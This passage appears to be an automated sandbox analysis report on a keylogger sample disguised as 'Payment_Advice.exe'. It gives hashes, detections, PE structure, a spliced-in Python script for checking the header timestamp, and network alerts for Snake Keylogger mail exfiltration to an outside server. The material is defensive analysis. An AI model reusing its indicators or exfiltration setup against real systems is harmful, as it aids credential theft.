                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1111944
                                                    Category:dropped
                                                    Size (bytes):758601
                                                    Entropy (8bit):7.98639316555857
                                                    Encrypted:false
                                                    SSDEEP:12288:ONh3P65+Tegs6121D1ybxrr/IxkB1mabFhOXZ/fEa+fDERXTJJJJv+9UZwY0SWB4:O3Pjegf121DMNB1DofjEiJJJJm94GS84
                                                    MD5:FA6978A9EA472E8ACFF72AFE8CC7CC81
                                                    SHA1:D58155446B67ACF4DA331A977B8EC7BA105C2C4F
                                                    SHA-256:3D0DF2B14FC632520705424D2DA394922D3EDD8C977950656B736352CD5A37E2
                                                    SHA-512:6B16382E6A4B9EECB8E8FB82189C2741511E8CF99C83B3FA52B062165B3B366EE0C11A7F60CE4B08D881B2418234097FA13CCAA9C90B1D7D37BD4D9A56EBA96C
                                                    Malicious:false
                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                    Category:dropped
                                                    Size (bytes):386528
                                                    Entropy (8bit):7.9736851559892425
                                                    Encrypted:false
                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                    Malicious:false
                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1041408
                                                    Entropy (8bit):6.655555563448097
                                                    Encrypted:false
                                                    SSDEEP:12288:vjU00pFjzc/AKVH/bcZb8lSnnJ8HMiEJy5EDbRFd1Sch9hNiERMDUIPMbP:H0s39wuEJ8U1hVRMDUzbP
                                                    MD5:012DE24142F859797FBB5A25A7A3290D
                                                    SHA1:85D6C307D84921B5A914D083FDB7DB22F2AAE865
                                                    SHA-256:17E0BBF042B7403409739925E10C2FCF406C4DC269C189BCAABC8693A2F95D9B
                                                    SHA-512:B3A58F443FACAAC2571CDCB21D188D2716923C9405841310D674180D755EBA47FC34C2A027DBB67BC27FA733E9066A6809E9658EA90D919C4540E4B968F4C94F
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Temp\hadvices.scr, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
• Antivirus: Virustotal, Detection: 35%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0.................. ........@.. .......................@............@.....................................S............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................D...............................................@....+.......>.."V...]...}..D...........@....+.."V..D........ .......,...+..'W...V..G.....................................@.......0.......................@.......0.......................@.......0.....Y.......~....".. ........................................._!._&._,._.._?._^._|._||._S.+.A.AA.ADV.AE.AEX.AH.AI...AN..AO.AOE.AOX...API.ASP.ATR.AU...AX.AXR.B.BB.BH.BIM.BVA.BVD.C.CC...CC2.CCK.CEN.CH...CH2.CJ.CT.C
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.460820661403651
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Payment_Advice.exe
                                                    File size:957'952 bytes
                                                    MD5:e708aa3160e224de971421d5bc2fee29
                                                    SHA1:7db6e4d3e5e2db1cd12717fa9a62a35a52834c02
                                                    SHA256:ba78d6ffbd1bd564598b33a3d28d437b3fe7129ffb93dee80e732e44098b9aa9
                                                    SHA512:47bff81600e4ff9e0a4fdbfa5f16141057bfca9fc0117cc2950428f6c627830482fc683c942a48ca77d37c3f4031d2585999453ce7c877eba6428cfe9ed2eff2
                                                    SSDEEP:12288:zjU00pFjzc/AKi9r4atz4fM3F58HMiEJy54ll8zhc6O6vo6Oh8IPMbP:L0s3iN4atkA/8Rze78zbP
                                                    TLSH:20156A593BE44657DDBA433F60EB49396BB9EC0A2213EB0F0381B57A3C13398D8515A7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0.................. ........@.. ....................................@................................
                                                    Icon Hash:131313132b1fdf7a
                                                    Entrypoint:0x4ea08e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xDD330B0C [Thu Aug 7 15:51:40 2087 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
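Added example, not from the report: the COFF TimeDateStamp 0xDD330B0C in the table above resolves to 7 Aug 2087, which is what the "Binary contains a suspicious time stamp" signature refers to. The Python below reads the field from a PE header, decodes it and rates it against the analysis date. The header bytes are constructed for the demo (the e_lfanew value is an assumption; the i386 machine type, three sections and the EXECUTABLE_IMAGE | 32BIT_MACHINE characteristics follow the static info above), and the analysis date is taken from the Acrobat log records above (2024-05-01, UTC assumed). Caveat for a .NET assembly like this sample: Roslyn deterministic builds write a hash of the compilation inputs into this field, so a far-future stamp is weak evidence on its own and belongs alongside the other signatures, not in place of them.

```python
"""Read a PE TimeDateStamp and rate it against the analysis date.

Added example; not part of the report and not Joe Sandbox code.
"""
import struct
from datetime import datetime, timezone

# Analysis date taken from the Acrobat log records in the report (2024-05-01); UTC assumed.
ANALYSIS_DATE = datetime(2024, 5, 1, tzinfo=timezone.utc)


def build_pe_prefix(stamp: int, machine: int = 0x014C, nsections: int = 3) -> bytes:
    """Constructed PE prefix for the demo (not the sample's real bytes).

    DOS header with e_lfanew = 0x80 (assumed; the report does not give it), the PE
    signature and an IMAGE_FILE_HEADER. Machine 0x014C (i386), three sections
    (.text/.rsrc/.reloc in the preview) and Characteristics EXECUTABLE_IMAGE |
    32BIT_MACHINE (0x0102) follow the report's static info; SizeOfOptionalHeader is
    the PE32 value 0xE0.
    """
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    coff = struct.pack("<HHIIIHH", machine, nsections, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def read_pe_timestamp(data: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp, raising if the buffer is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    # IMAGE_FILE_HEADER follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    _machine, _nsections, stamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return stamp


def decode_timestamp(stamp: int) -> datetime:
    """The field is an unsigned 32-bit count of seconds since the Unix epoch, in UTC."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def classify_timestamp(stamp: int, analysed_at: datetime, is_dotnet: bool = False) -> str:
    """Rate a stamp as zeroed, invalid, future-dated, implausibly old or plausible.

    A build time later than the analysis time cannot be a wall-clock value. For .NET
    assemblies that is weaker evidence of tampering than it looks: Roslyn deterministic
    builds (the default for SDK-style projects) store a hash of the compilation inputs
    in this field, which routinely decodes to a far-future date.
    """
    if stamp == 0:
        return "zeroed"
    if stamp == 0xFFFFFFFF:
        return "invalid"
    built = decode_timestamp(stamp)
    if built > analysed_at:
        return "future-dated (possible deterministic-build hash)" if is_dotnet else "future-dated"
    if built.year < 1993:  # earlier than any PE-format Windows release
        return "implausibly old"
    return "plausible"


def triage_header(data: bytes, analysed_at: datetime = ANALYSIS_DATE, is_dotnet: bool = False) -> dict:
    """Read, decode and rate the stamp of one PE header in a single call."""
    stamp = read_pe_timestamp(data)
    return {
        "stamp": f"0x{stamp:08X}",
        "decoded_utc": decode_timestamp(stamp).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "verdict": classify_timestamp(stamp, analysed_at, is_dotnet),
    }


if __name__ == "__main__":
    # The sample is a .NET assembly per the file type and TrID rows above.
    print(triage_header(build_pe_prefix(0xDD330B0C), is_dotnet=True))
```

On a real file, pass the first few hundred bytes of the sample to `triage_header` instead of the constructed prefix; the stamp sits at `e_lfanew + 8`, so nothing beyond the COFF header is needed. Bytes 0x0C 0x0B 0x33 0xDD little-endian give 0xDD330B0C, which decodes to the report's Thu Aug 7 15:51:40 2087 UTC.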
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xea038 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xec000 | 0x17de | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xee000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe8094 | 0xe8200 | 644cabe1e754238fe79bcec5055a8acd | False | 0.47247534666128166 | data | 6.463464649180666 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xec000 | 0x17de | 0x1800 | edc62ffa8b8153a2c395be52c8763ecd | False | 0.55712890625 | data | 5.839695724020961 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xee000 | 0xc | 0x200 | d125e5c7a86b1f9684280e3011c68b6c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xec130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.6090525328330206
RT_GROUP_ICON | 0xed1d8 | 0x14 | data | | | 1.1
RT_VERSION | 0xed1ec | 0x408 | data | | | 0.3953488372093023
RT_MANIFEST | 0xed5f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/01/24-15:18:36.864942 | TCP | 2044767 | ET TROJAN Snake Keylogger Exfil via SMTP | 49745 | 587 | 192.168.2.7 | 108.167.142.65
05/01/24-15:18:34.721845 | TCP | 2044767 | ET TROJAN Snake Keylogger Exfil via SMTP | 49744 | 587 | 192.168.2.7 | 108.167.142.65
05/01/24-15:18:41.126293 | TCP | 2044767 | ET TROJAN Snake Keylogger Exfil via SMTP | 49747 | 587 | 192.168.2.7 | 108.167.142.65
05/01/24-15:18:39.013246 | TCP | 2044767 | ET TROJAN Snake Keylogger Exfil via SMTP | 49746 | 587 | 192.168.2.7 | 108.167.142.65
05/01/24-15:18:23.398629 | TCP | 2044767 | ET TROJAN Snake Keylogger Exfil via SMTP | 49743 | 587 | 192.168.2.7 | 108.167.142.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 1, 2024 15:17:06.996691942 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:06.996715069 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:06.996799946 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.006934881 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.006953001 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.223221064 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.223295927 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.226128101 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.226140022 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.226448059 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.236176968 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.280107975 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890074015 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890125990 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890152931 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890171051 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.890178919 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890196085 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890249014 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.890269041 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890297890 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890312910 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.890321016 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890357971 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.890650988 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890734911 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890760899 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890774965 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.890790939 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.890830040 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.891176939 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.944483042 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.944528103 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.944535971 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.944670916 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.944709063 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.944717884 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.944992065 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945030928 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.945039988 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945070982 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945121050 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.945127964 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945596933 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945641041 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945667028 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.945667028 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945678949 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:07.945709944 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:07.992554903 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.007276058 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007392883 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007416010 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007431984 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.007440090 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007477045 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.007704973 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007764101 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007790089 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007808924 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.007816076 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.007859945 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.008304119 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.008347034 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.008369923 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.008385897 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.008393049 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.008428097 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.008434057 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.009215117 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.009253025 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.009258986 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.009331942 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.009367943 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.009370089 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.009381056 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.009413958 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.009432077 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.010160923 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.010209084 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.010215044 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.010257959 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.057837009 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.057909966 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
May 1, 2024 15:17:08.058008909 CEST | 443 | 49704 | 172.67.141.195 | 192.168.2.7
May 1, 2024 15:17:08.058056116 CEST | 49704 | 443 | 192.168.2.7 | 172.67.141.195
